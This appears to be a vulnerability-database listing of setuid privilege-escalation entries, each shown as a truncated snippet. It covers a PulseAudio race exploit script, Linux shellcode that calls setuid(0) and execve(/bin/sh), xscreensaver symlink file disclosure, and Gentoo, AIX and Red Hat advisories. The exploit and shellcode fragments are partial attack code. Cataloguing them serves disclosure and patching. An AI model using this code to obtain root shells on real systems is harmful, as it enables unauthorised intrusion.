PulseAudio setuid Local Privilege Escalation Exploit
No description provided by source. !/bin/bash pulseaudio=which pulseaudio workdir="/tmp" workdir=$HOME id=which id shell=which sh trap cleanup INT function cleanup rm -f $workdir/sh $workdir/sh.c $workdir/parace $workdir/parace.c rm -rf $workdir/PATMP cat $workdir/parace.c EOF include stdio.h...
PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)
No description provided by source. PulseAudio setuid Local Privilege Escalation Vulnerability http://www.securityfocus.com/bid/35721 Credit for discovery of bug: Tavis Ormandy, Julien Tinnes and Yorick Koster -- Put files in /tmp/pulseaudio-exp or change config.h. Must be on same fs as the...
Pulse Audio setuid Privilege Escalation
!/bin/bash pulseaudio=which pulseaudio workdir="/tmp" workdir=$HOME id=which id shell=which sh trap cleanup INT function cleanup rm -f $workdir/sh $workdir/sh.c $workdir/parace $workdir/parace.c rm -rf $workdir/PATMP cat $workdir/parace.c include include include include include define...
GLSA-200907-13 : PulseAudio: Local privilege escalation
The remote host is affected by the vulnerability described in GLSA-200907-13 PulseAudio: Local privilege escalation Tavis Ormandy and Julien Tinnes of the Google Security Team discovered that the pulseaudio binary is installed setuid root, and does not drop privileges before re-executing itself...
Null pointer dereference
The personality subsystem in the Linux kernel before 2.6.31-rc3 has a PERCLEARONSETID setting that does not clear the ADDRCOMPATLAYOUT and MMAPPAGEZERO flags when executing a setuid or setgid program, which makes it easier for local users to leverage the details of memory usage to 1 conduct NULL...
CVE-2009-1895
The personality subsystem in the Linux kernel before 2.6.31-rc3 has a PERCLEARONSETID setting that does not clear the ADDRCOMPATLAYOUT and MMAPPAGEZERO flags when executing a setuid or setgid program, which makes it easier for local users to leverage the details of memory usage to 1 conduct NULL...
xscreensaver 5.01 - Arbitrary File Disclosure Symlink
xscreensaver local arbitrary file disclosure | symlink attack The 'xscreensaver' program distributed normally with Xorg can be abused to disclose local files owned by other users also of the root account. Xscreensaver has the setuid bit on...
xscreensaver 5.01 - Arbitrary File Disclosure Symlink
xscreensaver local arbitrary file disclosure | symlink attack The 'xscreensaver' program distributed normally with Xorg can be abused to disclose local files owned by other users also of the root account. Xscreensaver has the setuid bit on by default Example: Opensolaris The xscreensaver...
xscreensaver Symlink Attack
xscreensaver local arbitrary file disclosure | symlink attack The 'xscreensaver' program distributed normally with Xorg can be abused to disclose local files owned by other users also of the root account. Xscreensaver has the setuid bit on by default Example: Opensolaris The xscreensaver program...
Linux/x86 - setuid(0) + execve(/bin/sh) Shellcode (27 bytes)
Linux/x86 - setuid0 + execve/bin/sh Shellcode 27 bytes. Shellcode exploit for Linuxx86 platform include const char sc= "\x31\xdb" //xor ebx,ebx "\x8d\x43\x17" //LEA eax,ebx + 0x17 /LEA is FASTER tha push/pop "\x99" //cdq "\xcd\x80" //int 80 //setuid0 shouldn't returns -1 right? ; "\xb0\x0b" //mov...
Linux/x86 - Disable Shadowing Shellcode (42 bytes)
Linux/x86 - Disable Shadowing Shellcode 42 bytes. Shellcode exploit for Linuxx86 platform include const char sc= "\x31\xdb" //xor ebx,ebx "\x8d\x43\x17" //LEA eax,ebx + 0x17 /LEA is FASTER than push and pop! "\x99" //cdq "\xcd\x80" //int 80 //setuid0 shouldn't returns -1 right? ; "\xb0\x0b" //mov...
Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh,[/bin/sh,NULL])) Shellcode (25 bytes)
Linux/x86 - setuid0 + setgid0 + execve/bin/sh,/bin/sh,NULL Shellcode 25 bytes. Shellcode exploit for Linuxx86 platform include const char shellcode= "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\xcd\x80" // int $0x80 "\xb0\x2e" // mov $0x2e,%al "\xcd\x80" // int $0x80...
Linux/x86 - setuid(0) + execve(/bin/sh,0) Shellcode (25 bytes)
Linux/x86 - setuid0 + execve/bin/sh,0 Shellcode 25 bytes. Shellcode exploit for Linuxx86 platform include const char shellcode= "\x6a\x17" // push $0x17 "\x58" // pop %eax "\x31\xdb" // xor %ebx,%ebx "\xcd\x80" // int $0x80 "\xb0\x0b" // mov $0xb,%al So you'll get segfault if it's not able to do...
AIX 6.1 TL 1 : bos.rte.cron (U825668)
The remote host is missing AIX PTF U825668, which is related to the security of the package bos.rte.cron. The at command does not drop permissions when reading certain files. A local attacker may exploit this error to read any file on the system because the command is setuid root. The following...
AIX 6.1 TL 2 : bos.rte.cron (U825550)
The remote host is missing AIX PTF U825550, which is related to the security of the package bos.rte.cron. The at command does not drop permissions when reading certain files. A local attacker may exploit this error to read any file on the system because the command is setuid root. The following...
kernel: exit_notify: kill the wrong capable(CAP_KILL) check
The exitnotify function in kernel/exit.c in the Linux kernel before 2.6.30-rc1 does not restrict exit signals when the CAPKILL capability is held, which allows local users to send an arbitrary signal to a process by running a program that modifies the exitsignal field and then uses an exec system...
Important: Red Hat Security Advisory: kernel security and bug fix update
Updated kernel packages that fix two security issues and two bugs are now available for Red Hat Enterprise Linux 4.7 Extended Update Support. This update has been rated as having important security impact by the Red Hat Security Response Team. The kernel packages contain the Linux kernel, the cor...
Important: Red Hat Security Advisory: Red Hat Enterprise Linux 4.8 kernel security and bug fix update
Updated kernel packages are now available as part of the ongoing support and maintenance of Red Hat Enterprise Linux version 4. This is the eighth regular update. These updated packages fix two security issues, hundreds of bugs, and add numerous enhancements. Space precludes a detailed descriptio...
linux/x86-64 setuid(0) + execve(/bin/sh) 49 bytes
No description provided by source. / setuid0 + execve/bin/sh - just 4 fun. xi4oyu at 80sec.com main asm "xorq %rdi,%rdi\n\t" "mov $0x69,%al\n\t" "syscall \n\t" "xorq %rdx, %rdx \n\t" "movq $0x68732f6e69622fff,%rbx; \n\t" "shr $0x8, %rbx; \n\t" "push %rbx; \n\t" "movq %rsp,%rdi; \n\t" "xorq...